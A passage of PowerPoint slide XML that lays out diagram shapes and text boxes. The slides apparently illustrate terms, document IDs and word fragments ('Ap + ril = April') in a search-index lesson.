            <a:endCxn id="56" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6612026" y="4184077"/>
            <a:ext cx="772402" cy="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8" name="Straight Connector 57"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="56" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927800" y="4184077"/>
            <a:ext cx="772401" cy="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7570807" y="3935808"/>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65978" y="3935808"/>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8412040" y="4001240"/>
            <a:ext cx="911825" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64" name="Straight Connector 63"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="63" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9323865" y="4183956"/>
            <a:ext cx="842114"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5" name="Straight Connector 64"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="63" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570807" y="4183956"/>
            <a:ext cx="841233"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1788177" y="3934696"/>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720024" y="3934696"/>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2798188" y="3990240"/>
            <a:ext cx="911825" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Straight Connector 49"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="49" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3710013" y="4174906"/>
            <a:ext cx="1010011" cy="917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1" name="Straight Connector 50"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="49" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1788177" y="4174906"/>
            <a:ext cx="1010011" cy="917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3" name="Straight Connector 2"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="49" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3254101" y="4359572"/>
            <a:ext cx="0" cy="78869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1108460" y="5148263"/>
            <a:ext cx="4291279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407231584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21069" y="2950158"/>
            <a:ext cx="8522057" cy="881311"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1834357" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279419" y="2950158"/>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824159" y="2950158"/>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92708" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2951058" y="3207976"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3817068" y="2950158"/>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930356" y="3070846"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828450" y="2950157"/>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936877" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5381939"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486480" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5931542"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6043073" y="3207976"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ril</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508815"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6619019" y="3070846"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7492487" y="2950157"/>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7593881" y="3207975"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038943"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8140336" y="3207975"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8585398"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686790" y="3178465"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>pie</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9236561" y="293742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9346764" y="3041335"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Straight Connector 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927800" y="3935930"/>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7384426" y="3935930"/>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5700201" y="4001240"/>
            <a:ext cx="911825" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Connector 56"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="56" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6612026" y="4184077"/>
            <a:ext cx="772402" cy="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8" name="Straight Connector 57"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="56" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927800" y="4184077"/>
            <a:ext cx="772401" cy="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7570807" y="3935808"/>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65978" y="3935808"/>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8412040" y="4001240"/>
            <a:ext cx="911825" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64" name="Straight Connector 63"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="63" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9323865" y="4183956"/>
            <a:ext cx="842114"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5" name="Straight Connector 64"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="63" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570807" y="4183956"/>
            <a:ext cx="841233"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1788177" y="3934696"/>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720024" y="3934696"/>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2798188" y="3990240"/>
            <a:ext cx="911825" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Straight Connector 49"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="49" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3710013" y="4174906"/>
            <a:ext cx="1010011" cy="917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1" name="Straight Connector 50"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="49" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1788177" y="4174906"/>
            <a:ext cx="1010011" cy="917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a:off x="6146591" y="4422930"/>
            <a:ext cx="0" cy="78869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000950" y="5211621"/>
            <a:ext cx="4291279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ril</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = April</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56229855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21069" y="2950158"/>
            <a:ext cx="8522057" cy="881311"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1834357" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279419" y="2950158"/>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824159" y="2950158"/>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92708" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2951058" y="3207976"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3817068" y="2950158"/>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930356" y="3070846"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828450" y="2950157"/>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936877" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5381939"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486480" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5931542"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6043073" y="3207976"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ril</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508815"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6619019" y="3070846"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
